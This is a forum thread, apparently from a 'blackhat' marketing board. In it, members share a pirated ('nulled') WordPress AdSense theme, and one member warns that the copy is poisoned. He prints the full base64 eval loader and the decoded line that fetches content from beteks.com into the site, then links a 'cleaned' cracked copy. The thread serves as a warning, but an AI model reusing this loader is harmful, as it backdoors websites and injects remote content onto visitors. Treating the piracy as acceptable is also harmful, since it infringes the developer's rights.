[GET] CTR Theme 1.4.5 - Latest - Nulled - WORKING

[alondra]

CTR Theme (for Wordpress) makes it easy to build informational websites monetized with AdSense that get awesome click-through rates (CTR). AdSense provides hands-off recurring income, but usually these sites leave a lot of money on the table by having bad designs or underoptimized ad placement.

CTR Theme makes it simple to turn almost any niche into a winner in just a few seconds.

Download:[spoiler]
link removed

Please add more mirrors.

[simey69]

POISONED SHARE

DO NOT USE

Alondra, why are you sharing this?
you have already shared it here (clean code and live link):
http://bestblackhatforum.com/Thread-GET-...est-Nulled

This code is poisoned - it contains encoded call as follows in functions.php

Code:

echo @file_get_contents("http://www.beteks.com/links.php?url=".$_SERVER["SERVER_NAME"]);

Please remove this link asap

Si

[JOEMLM]

sorry for asking
can you explain why it is poisoned?
if it is not too much trouble, so i will know what to look for
so will other people, as made obvious by this share

[JOEMLM]

sorry for asking
can you explain why it is poisoned?
if it is not too much trouble, so i will know what to look for
so will other people, as made obvious by this share

[simey69]

Hi,

basically, within one of the main parts of the theme, some encrypted code has been added - this code fetches more code/content from an other site and places it in the code that your site delivers to the user.

this has many possible impacts...
- right now, I'm seeing links returned, so is scattering backlinks around for someone, adding them to your site (these links are typically low quality sites such as loans/meds/porn etc but can be anything)
- you could also get iframes and javascript - this can then hijack your site functionality, add cpa/locker code, malware, adware, trojans etc
- such content can get you slapped by google or even listed as phishing/malware site


it's a case of running through the code and finding odd/dodgy looking code
this one has this:

Code:

eval(base64_decode("QCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoIndwLWluY2x1ZGVzL2Z1bmN0aW9ucy5waHAiKTsN​CiRjb250ZW50ID0gc3RyX3JlcGxhY2UoJyogVXNlcyB0aGUgIlRoZSBUb3J0b2lzZSBhbmQgdGhlIEhh​cmUiIGFsZ29yaXRobSB0byBkZXRlY3QgbG9vcHMuJw0KLCINCiovDQpmdW5jdGlvbiB0aGVtZVJlbmRl​cigpIHsNCglldmFsKGJhc2U2NF9kZWNvZGUoJ1pXTm9ieUJBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1v​SW1oMGRIQTZMeTkzZDNjdVltVjBaV3R6TG1OdmJTOXNhVzVyY3k1d2FIQS9kWEpzUFNJdUpGOVRSVkpX​UlZKYklsTkZVbFpGVWw5T1FVMUZJbDBwT3c9PScpKTsNCn0NCi8qDQoiLCRjb250ZW50KTsNCg0KQGZp​bGVfcHV0X2NvbnRlbnRzKCJ3cC1pbmNsdWRlcy9mdW5jdGlvbnMucGhwIiwkY29udGVudCk7DQoNCg0K​JGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygiaW5kZXgucGhwIik7DQppZighc3Ryc3RyKCRjb250​ZW50LCJ0aGVtZVJlbmRlciIpKSB7DQoJJGNvbnRlbnQgPSBzdHJfcmVwbGFjZSgnPz4nDQoJLCINCnRo​ZW1lUmVuZGVyKCk7DQo/Pg0KCSIsJGNvbnRlbnQpOw0KDQoJZmlsZV9wdXRfY29udGVudHMoImluZGV4LnBocCIsJGNvbnRlbnQp​Ow0KfQ=="));

which when decoded (many base64 decoders online - just google it) gives more code and more encoded stuff, which when decoded shows the injection/fetcher code as above

I'm not suggesting that Alondra is doing this on purpose as previous shares are always high quality, so maybe just found a bad share source.

I've got the infected shares and will clean them up in the next day or so (very busy workload today and want to check them through 100% to be safe) - then will post the clean shares back

if you see/find any you're unsure of, feel free to drop me a pm to check it

Si

[simey69]

Ok, here is the cleaned version of the above share, poisoned code removed.

Code:

http://uploadmirrors.com/download/0NHTV5LZ/ctr-theme.zip

VT: Clean 0/42

Code:

https://www.virustotal.com/file/657b06ebf79c5a41d57565a6abb6197ac8553ff10d7ab1f1fd713b44e2ebd95b/analysis/1337280521/

Enjoy,
Si

[JOEMLM]

now i know why simey69 is a superVIP
thank you very much

[amore]

Thanks for watching out for us.

[chocfahad]

this theme is not working... i guess its some kind of script BEWARE

[godarm]

Thanks simey69 for saving my day!